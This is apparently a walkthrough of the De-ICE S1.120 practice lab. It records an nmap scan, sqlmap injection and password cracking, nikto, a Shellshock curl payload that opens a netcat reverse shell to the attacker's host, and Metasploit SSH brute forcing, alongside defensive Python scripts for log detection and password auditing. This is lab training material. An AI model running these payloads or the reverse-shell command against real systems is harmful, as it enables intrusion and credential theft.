While digging through an old external drive I found the De-ICE LiveCDs and the walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are kept in the walkthrough section so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

De-ICE S1.120

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso

Default IP: 192.168.1.120

Flags:
1. Create list of open ports
2. This is primarily a web penetration test; act accordingly
3. Obtain access to file system
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: Rummage about in the file system

Spoilers and Walkthrough

Port scan the image to get started.

root@SNM-KScan-2:~# nmap -sV -T4 192.168.1.120

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-07 13:53 MST
Nmap scan report for 192.168.1.120
Host is up (0.00047s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2
22/tcp   open  ssh      OpenSSH 5.1 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
443/tcp  open  ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:A4:37:1E (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.37 seconds

This is primarily a vulnerable web app, so I started by working on HTML injection on the http://192.168.1.120/add_product.php page:
<h1>htmlinjection</h1>
<h1>htmlinjection1</h1>
<h1>htmlinjection2</h1>
Normally, if you can get HTML injection it is possible to get XSS if you can bypass whatever filter is in place. I only use the number to keep track of which injection actually worked. I used Burp to capture the request, then saved it and loaded it into sqlmap: -r takes the file I saved the request to, and -p is the name of the parameter to attack.

sqlmap -r /root/Desktop/deice/120webrequest -p price

No joy, so let's hit it a little harder.

sqlmap -r /root/Desktop/deice/120webrequest -p price --level=5 --risk=3

Nope. Let's try the other parameters.

sqlmap -r /root/Desktop/deice/120webrequest -p product --level=5 --risk=3
sqlmap -r /root/Desktop/deice/120webrequest -p description --level=5 --risk=3

I might have busted it, but there is another parameter here you can test. Feed the id parameter at http://192.168.1.120/products.php?id=1 to sqlmap using the --wizard option.

root@SNM-KScan-2:~# sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:43:07

[14:43:07] [INFO] parsing HTTP request from '/root/Desktop/deice/120webrequest2'
[14:43:07] [INFO] testing connection to the target URL
[14:43:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[14:43:08] [INFO] target URL is stable
[14:43:08] [INFO] testing if GET parameter 'id' is dynamic
[14:43:08] [INFO] confirming that GET parameter 'id' is dynamic
[14:43:08] [INFO] GET parameter 'id' is dynamic
[14:43:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[14:43:09] [INFO] testing for SQL injection on GET parameter 'id'
[14:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:43:10] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable

BOOM goes the dynamite! Now we wait while sqlmap handles its business. If you don't want to mess with Burp, the same thing straight from the command line is:

sqlmap --banner --dbms=mysql -u "http://192.168.1.120/products.php?id=1"

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:05:47

[09:05:47] [INFO] testing connection to the target URL
[09:05:47] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:05:48] [INFO] target URL is stable
[09:05:48] [INFO] testing if GET parameter 'id' is dynamic
[09:05:49] [INFO] confirming that GET parameter 'id' is dynamic
[09:05:49] [INFO] GET parameter 'id' is dynamic
[09:05:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[09:05:49] [INFO] testing for SQL injection on GET parameter 'id'
[09:05:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:05:49] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[09:05:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:05:49] [INFO] testing 'MySQL inline queries'
[09:05:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:05:49] [WARNING] time-based comparison requires larger statistical model, please wait..................                                          
[09:05:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:06:00] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable 
[09:06:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:06:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:06:00] [WARNING] reflective value(s) found and filtering out
[09:06:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1082=1082

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[09:06:14] [INFO] the back-end DBMS is MySQL
[09:06:14] [INFO] fetching banner
[09:06:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:06:14] [INFO] retrieved: 5.1.33
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
banner:    '5.1.33'
[09:06:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'

[*] shutting down at 09:06:16
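From the defender's side, every one of those 71 requests lands in the Apache access log. As an added example (not part of the original walkthrough), the Python script below parses combined-format log lines, flags the boolean-based and time-based payloads sqlmap reported for the id parameter, and spots the request burst a scanner produces against one path. The log lines are constructed to mirror sqlmap's requests, and the burst thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format:
# host ident user [time] "method target protocol" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Derived from the injection points sqlmap reported for products.php?id=1
# ("AND 1082=1082" and "AND SLEEP(5)"), plus the UNION and stacked-query
# techniques it was seen testing.
SQLI_PATTERNS = [
    ("boolean-blind", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("time-blind", re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I)),
    ("union", re.compile(r"\bUNION\b.{0,40}\bSELECT\b", re.I)),
    ("stacked", re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I)),
]
SCANNER_AGENTS = ("sqlmap", "nikto")  # default banners; trivially changed, so never relied on alone
BURST_THRESHOLD = 20   # assumption: this many hits on one path from one IP ...
BURST_WINDOW_S = 60    # ... inside this window is a scanner, not a person

def parse_line(line):
    """Parse one combined-format line; return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes values, so "1%20AND%201082%3D1082" becomes "1 AND 1082=1082"
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec

def classify(rec):
    """Return (parameter, technique) hits for one parsed record."""
    hits = []
    for name, value in rec["params"]:
        for technique, pat in SQLI_PATTERNS:
            if pat.search(value):
                hits.append((name, technique))
    if any(tag in rec["agent"].lower() for tag in SCANNER_AGENTS):
        hits.append(("user-agent", "scanner-banner"))
    return hits

def analyse(lines):
    """Return ([(ip, path, hits), ...], [(ip, path), ...]): payload hits and request bursts."""
    findings = []
    by_source = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            findings.append((rec["ip"], rec["path"], hits))
        by_source[(rec["ip"], rec["path"])].append(rec["time"])
    bursts = []
    for key, times in by_source.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):  # sliding window over sorted timestamps
            while (times[hi] - times[lo]).total_seconds() > BURST_WINDOW_S:
                lo += 1
            if hi - lo + 1 >= BURST_THRESHOLD:
                bursts.append(key)
                break
    return findings, bursts

# Constructed sample, modelled on the requests sqlmap sent at 09:05 in the run above.
SAMPLE_LOG = """\
192.168.1.130 - - [08/Jan/2015:09:05:47 -0700] "GET /products.php?id=1 HTTP/1.1" 200 2431 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.130 - - [08/Jan/2015:09:05:49 -0700] "GET /products.php?id=1%20AND%201082%3D1082 HTTP/1.1" 200 2431 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.130 - - [08/Jan/2015:09:05:49 -0700] "GET /products.php?id=1%20AND%201082%3D1083 HTTP/1.1" 200 1877 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.130 - - [08/Jan/2015:09:05:55 -0700] "GET /products.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 2431 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.50 - - [08/Jan/2015:09:06:10 -0700] "GET /products.php?id=2 HTTP/1.1" 200 2210 "http://192.168.1.120/" "Mozilla/5.0 (X11; Linux x86_64)"
"""

if __name__ == "__main__":
    findings, bursts = analyse(SAMPLE_LOG.splitlines())
    for ip, path, hits in findings:
        print(f"{ip} {path}: {hits}")
    for ip, path in bursts:
        print(f"burst: {ip} -> {path}")
```

The boolean-based and time-based probes are still visible even when the scanner banner is changed, which is why the payload patterns and the burst count are checked independently of the User-Agent.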

It is time to get down on the database.

sqlmap --dbms=mysql -u "http://192.168.1.120/products.php?id=1" --users --passwords -o --threads=8 --time-sec=1

**** Partial output. This takes a while. ****
database management system users [50]:
[*] 'aadams'@'localhost'
[*] 'aallen'@'localhost'
[*] 'aard'@'localhost'
[*] 'aharp'@'localhost'
[*] 'aheflin'@'localhost'
[*] 'amaynard'@'localhost'
[*] 'aspears'@'localhost'
[*] 'aweiland'@'localhost'
[*] 'bbanter'@'localhost'
[*] 'bphillips'@'localhost'
[*] 'bwatkins'@'localhost'
[*] 'cchisholm'@'localhost'
[*] 'ccoffee'@'localhost'
[*] 'dcooper'@'localhost'
[*] 'dgilfillan'@'localhost'
[*] 'dgrant'@'localhost'
[*] 'djohnson'@'localhost'
[*] 'dstevens'@'localhost'
[*] 'dtraylor'@'localhost'
[*] 'dwestling'@'localhost'
[*] 'hlovell'@'localhost'
[*] 'jalcantar'@'localhost'
[*] 'jalvarez'@'localhost'
[*] 'jayala'@'localhost'
[*] 'jbresnahan'@'localhost'
[*] 'jdavenport'@'localhost'
[*] 'jduff'@'localhost'
[*] 'jfranklin'@'localhost'
[*] 'kclemons'@'localhost'
[*] 'krenfro'@'localhost'
[*] 'ktso'@'localhost'
[*] 'kwebber'@'localhost'
[*] 'lmartinez'@'localhost'
[*] 'lmorales'@'localhost'
[*] 'mbryan'@'localhost'
[*] 'mholland'@'localhost'
[*] 'mnader'@'localhost'
[*] 'mrodriguez'@'localhost'
[*] 'myajima'@'localhost'
[*] 'qpowers'@'localhost'
[*] 'rdominguez'@'localhost'
[*] 'rjacobson'@'localhost'
[*] 'rpatel'@'localhost'
[*] 'sgains'@'localhost'
[*] 'sjohnson'@'localhost'
[*] 'strammel'@'localhost'
[*] 'swarren'@'localhost'
[*] 'tdeleon'@'localhost'
[*] 'tgoodchap'@'localhost'
[*] 'webapp'@'localhost'

When it retrieves the password hashes, you will be prompted to let sqlmap crack them automatically.
Just note that there are so many usernames and passwords that the next couple of pages are a mass spoiler.

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:47:24] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-XtKh9b.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[09:47:39] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 2
what's the custom dictionary's location?
> /usr/share/wordlists/rockyou.txt
[09:48:22] [INFO] using custom dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[*] aadams [1]:
    password hash: *F491287896471CB21030790BF46865C4A39DE651
    clear-text password: batman
[*] aallen [1]:
    password hash: *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E
    clear-text password: superman
[*] aard [1]:
    password hash: *7FD9F123C9FC025372A5AAD19D107783CD19CCF7
    clear-text password: cheese
[*] aharp [1]:
    password hash: *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC
    clear-text password: pokemon
[*] aheflin [1]:
    password hash: *90837F291B744BBE86DF95A37D2B2524185DBBF5
    clear-text password: whatever
[*] amaynard [1]:
    password hash: *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0
    clear-text password: kotaku
[*] aspears [1]:
    password hash: *CFBF459D9D6057BC2A85477A38327B96F06B1597
    clear-text password: iloveyou
[*] aweiland [1]:
    password hash: *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC
    clear-text password: 666666
[*] bbanter [1]:
    password hash: *ED043A01F4583450BC8EB1E83C00C372CA49C4E4
    clear-text password: michelle
[*] bphillips [1]:
    password hash: *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1
    clear-text password: 123123
[*] bwatkins [1]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    clear-text password: 123456
[*] cchisholm [1]:
    password hash: *51AA306E66303073DBA15D2750E23C90C7A7F947
    clear-text password: baseball
[*] ccoffee [1]:
    password hash: *B12289EEF8752AD620294A64A37CD586223AB454
    clear-text password: 0
[*] dcooper [1]:
    password hash: *D6B63C1953E7F096DB307F8AC48C4AD703E57001
    clear-text password: sunshine
[*] dgilfillan [1]:
    password hash: *24B8599BAF46DD4B4D8DB50A3B10136457492622
    clear-text password: starwars
[*] dgrant [1]:
    password hash: *D37C49F9CBEFBF8B6F4B165AC703AA271E079004
    clear-text password: letmein
[*] djohnson [1]:
    password hash: *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8
    clear-text password: killer
[*] dstevens [1]:
    password hash: *797420C584EBF42750EB523104268BA0FD87FBC8
    clear-text password: internet
[*] dtraylor [1]:
    password hash: *79BF466BCC601BD91A0897BB162421F9BA8C29CA
[*] dwestling [1]:
    password hash: *7B2F14D9BB629E334CD49A1028BD85750F7D3530
    clear-text password: shadow
[*] hlovell [1]:
    password hash: *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91
    clear-text password: consumer
[*] jalcantar [1]:
    password hash: *46CFC7938B60837F46B610A2D10C248874555C14
    clear-text password: trustno1
[*] jalvarez [1]:
    password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
    clear-text password: password
[*] jayala [1]:
    password hash: *6691484EA6B50DDDE1926A220DA01FA9E575C18A
    clear-text password: abc123
[*] jbresnahan [1]:
    password hash: *446525BB82B5E22BD9E525261D37C494F623C52B
    clear-text password: blahblah
[*] jdavenport [1]:
    password hash: *61305383748FBEAB119F9A8BC35EBBADB4889A9D
[*] jduff [1]:
    password hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
    clear-text password: princess
[*] jfranklin [1]:
    password hash: *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5
    clear-text password: 654321
[*] kclemons [1]:
    password hash: *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3
    clear-text password: passw0rd
[*] krenfro [1]:
    password hash: *8D6A637F37955DBFCE1229204DDBED1CE11E6F41
    clear-text password: master
[*] ktso [1]:
    password hash: *A4B6157319038724E3560894F7F932C8886EBFCF
    clear-text password: 1234
[*] kwebber [1]:
    password hash: *F8E113FD51D520075836A4B815568BA2B96F7C30
    clear-text password: dragon
[*] lmartinez [1]:
    password hash: *626AC8265C7D53693CB7478376CE1B4825DFF286
    clear-text password: pepper
[*] lmorales [1]:
    password hash: *FCAAF3F0BD94C027B2769A95903C355CE6294660
    clear-text password: football
[*] mbryan [1]:
    password hash: *B021918A5DCA54916CF724573179571DFC37AC88
    clear-text password: jennifer
[*] mholland [1]:
    password hash: *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC
    clear-text password: jordan
[*] mnader [1]:
    password hash: *DF216F57F1F2066124E1AA5491D995C3CB57E4C2
    clear-text password: welcome
[*] mrodriguez [1]:
    password hash: *AA1420F182E88B9E5F874F6FBE7459291E8F4601
    clear-text password: qwerty
[*] myajima [1]:
    password hash: *3EEB06BE54EABF909DC8F6107110777F1DE43186
[*] qpowers [1]:
    password hash: *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00
    clear-text password: michael
[*] rdominguez [1]:
    password hash: *00A51F3F48415C7D4E8908980D443C29C69B60C9
    clear-text password: 12345
[*] rjacobson [1]:
    password hash: *FD571203974BA9AFE270FE62151AE967ECA5E0AA
    clear-text password: 111111
[*] rpatel [1]:
    password hash: *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5
    clear-text password: 1234567
[*] sgains [1]:
    password hash: *81101DED975D54BD76A3C8EAD293597AE9BB143F
    clear-text password: computer
[*] sjohnson [1]:
    password hash: *84AAC12F54AB666ECFC2A83C676908C8BBC381B1
    clear-text password: 12345678
[*] strammel [1]:
    password hash: *A5892368AE83685440A1E27D012306B073BDF5B7
    clear-text password: monkey
[*] swarren [1]:
    password hash: *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594
    clear-text password: Password
[*] tdeleon [1]:
    password hash: *94F3DC3F398B76269CAAD51627279D4233A6C89A
    clear-text password: soccer
[*] tgoodchap [1]:
    password hash: *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9
    clear-text password: nintendo
[*] webapp [1]:
    password hash: *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F
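All sqlmap is doing here is computing the MySQL 4.1+ PASSWORD() scheme, '*' followed by SHA1(SHA1(password)) in uppercase hex, for every word in the list and comparing. As an added example that is not from the original post, the script below runs the same audit from the DBA's side against an export of mysql.user, so weak and shared passwords are found before anyone else finds them. The three sample rows are taken from the output above; the weak-word list is a constructed stand-in for rockyou.txt.

```python
import hashlib
import re
from collections import defaultdict

# MySQL 4.1+ PASSWORD() scheme, which sqlmap calls 'mysql_passwd':
#   '*' + uppercase hex of SHA1(SHA1(password))
# Unsalted and cheap to compute, so a wordlist run through it finishes in seconds.
def mysql_password_hash(password):
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

HASH_RE = re.compile(r"^\*[0-9A-F]{40}$")

def parse_user_rows(text):
    """Parse 'user hash' rows, as exported with SELECT User, Password FROM mysql.user."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            rows.append((parts[0], parts[1]))
    return rows

def audit_accounts(accounts, weak_words):
    """Compare account hashes against a weak-password list.

    Returns a dict with:
      matched   - {user: weak_password} for hashes found in the list
      unmatched - users whose hash is well-formed but not in the list
      malformed - users whose hash is empty or not in the 4.1+ format
      shared    - {hash: [users]} where several accounts share one password
    """
    lookup = {mysql_password_hash(w): w for w in weak_words}
    result = {"matched": {}, "unmatched": [], "malformed": [], "shared": {}}
    by_hash = defaultdict(list)
    for user, h in accounts:
        h = h.strip().upper()
        if not HASH_RE.match(h):
            result["malformed"].append(user)
            continue
        by_hash[h].append(user)
        if h in lookup:
            result["matched"][user] = lookup[h]
        else:
            result["unmatched"].append(user)
    result["shared"] = {h: users for h, users in by_hash.items() if len(users) > 1}
    return result

# Constructed sample using three hashes from the sqlmap output above.
SAMPLE_USER_TABLE = """\
jalvarez *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
bwatkins *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
webapp   *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F
"""
# Short constructed list; in practice point this at the same wordlist an attacker would use.
WEAK_WORDS = ["password", "123456", "qwerty", "letmein", "batman"]

if __name__ == "__main__":
    report = audit_accounts(parse_user_rows(SAMPLE_USER_TABLE), WEAK_WORDS)
    for user, word in report["matched"].items():
        print(f"{user}: weak password ({word})")
    for user in report["unmatched"]:
        print(f"{user}: not in list")
    for h, users in report["shared"].items():
        print(f"shared password between {', '.join(users)}")
```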

We know that we have SQL injection, but let's hit it with nikto as well. This thing is a wreck.

root@SNM-KScan-2:~# nikto -h 192.168.1.120
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2015-01-08 09:21:21 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.26)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8429, size: 30894, mtime: Fri May 11 06:40:36 2007
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7354 requests: 0 error(s) and 25 item(s) reported on remote host
+ End Time:           2015-01-08 09:22:12 (GMT-7) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So I’m not giving up on Shellshock.

curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 192.168.1.130 5005"'  http://192.168.1.120/cgi-bin/printenv.cgi

Nope, no joy. Let's try some Metasploit attacks. Port 631 was listening and we have usernames and passwords.

use exploit/multi/http/cups_bash_env_exec

Even less joy. Sigh... let's just try the cracked passwords against the accounts. Our old friends ccoffee, bbanter and aadams are all there.

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                Required  Description
   ----              ---------------                --------  -----------
   BLANK_PASSWORDS   false                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  3                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                          no        Add all users in the current database to the list
   PASSWORD                                         no        A specific password to authenticate with
   PASS_FILE                                        no        File containing passwords, one per line
   RHOSTS            192.168.1.120                  yes       The target address range or CIDR identifier
   RPORT             22                             yes       The target port
   STOP_ON_SUCCESS   false                          yes       Stop guessing when a credential works for a host
   THREADS           1                              yes       The number of concurrent threads
   USERNAME                                         no        A specific username to authenticate as
   USERPASS_FILE     /root/Desktop/deice/users.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                          no        Try the username as the password for all users
   USER_FILE                                        no        File containing usernames, one per line
   VERBOSE           true                           yes       Whether to print output for all attempts


msf auxiliary(ssh_login) > run

[*] 192.168.1.120:22 SSH - Starting bruteforce
[+] 192.168.1.120:22 SSH - Success: 'aadams:batman' 'uid=1003(aadams) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 1 opened (192.168.1.130:60840 -> 192.168.1.120:22) at 2015-01-08 12:28:52 -0700
[+] 192.168.1.120:22 SSH - Success: 'aallen:superman' 'uid=1031(aallen) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 2 opened (192.168.1.130:33943 -> 192.168.1.120:22) at 2015-01-08 12:28:55 -0700
[+] 192.168.1.120:22 SSH - Success: 'aard:cheese' 'uid=1000(aard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 3 opened (192.168.1.130:49918 -> 192.168.1.120:22) at 2015-01-08 12:28:59 -0700
[+] 192.168.1.120:22 SSH - Success: 'aharp:pokemon' 'uid=1039(aharp) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 4 opened (192.168.1.130:38831 -> 192.168.1.120:22) at 2015-01-08 12:29:02 -0700
[+] 192.168.1.120:22 SSH - Success: 'aheflin:whatever' 'uid=1017(aheflin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 5 opened (192.168.1.130:43816 -> 192.168.1.120:22) at 2015-01-08 12:29:05 -0700
[+] 192.168.1.120:22 SSH - Success: 'amaynard:kotaku' 'uid=1018(amaynard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 6 opened (192.168.1.130:52789 -> 192.168.1.120:22) at 2015-01-08 12:29:08 -0700
[+] 192.168.1.120:22 SSH - Success: 'aspears:iloveyou' 'uid=1035(aspears) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
